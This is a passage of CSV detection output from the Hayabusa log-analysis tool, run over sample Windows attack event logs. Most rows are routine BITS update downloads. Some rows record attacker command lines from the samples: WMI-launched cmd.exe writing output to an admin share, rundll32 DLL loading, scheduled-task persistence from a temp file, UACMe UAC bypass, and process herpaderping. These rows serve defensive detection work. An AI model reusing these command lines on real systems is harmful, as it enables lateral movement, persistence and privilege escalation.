http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe : URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: calc.exe : Path: C:\Windows\SysWOW64\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\ProgramData\Intel\CV.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx -2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca : Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx -2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\RuntimeBroker.exe -Embedding : Path: C:\Windows\System32\RuntimeBroker.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx -2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.001,technique_name=PowerShell : Command: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 : Path: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.003,technique_name=Windows Command Shell : Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: DESKTOP-NTSSLJD\den : Parent Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\wermgr.exe : Path: C:\Windows\System32\wermgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe c:\temp\winfire.dll,DllRegisterServer",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Trickbot Malware Activity,,rules/sigma/process_creation/win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe : URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Users\Public\test.tmp ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: "".\samir.exe"" : Path: C:\Users\bouss\Downloads\samir.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx -2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx -2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 